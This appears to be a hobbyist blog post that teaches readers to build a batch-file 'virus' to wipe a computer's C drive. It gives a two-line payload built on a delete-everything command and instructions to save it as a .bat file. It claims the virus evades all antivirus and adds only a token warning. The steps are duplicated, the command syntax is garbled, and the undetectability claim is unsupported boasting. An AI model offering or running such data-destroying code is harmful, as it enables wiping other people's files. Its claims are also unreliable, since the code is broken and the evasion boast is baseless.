In my previous post i thought you guys how to create VIRUS that disable mouse and VIRUS to format Hard Disk . On this post i will be teaching you how to make a simple yet a very powerful or you can say dangerous computer VIRUS using a batch file.No software is needed to make this dangerous virus,Notepad is enough for it. the good thing about this VIRUS is, No Anti -Virus can detect this VIRUS .
What will this virus do?
You will create this virus using batch programming.This virus will delete the C Drivecompletely.The good this about this virus is that it is not detected by AntiVirus.
How to make this virus?
1.Open Notepad and copy below code into it
@Echo off
Del C:/*.*|y
2.Save this file as vius.bat(Name can be anything but it should be save .bat)
3.Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run this on your own computer or else it will delete all the content of C Drive. i will not be responsible for any damage done to your computer.
@Echo off
Del C:/*.*|y
2.Save this file as vius.bat(Name can be anything but it should be save .bat)
3.Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run this on your own computer or else it will delete all the content of C Drive. i will not be responsible for any damage done to your computer.
EmoticonEmoticon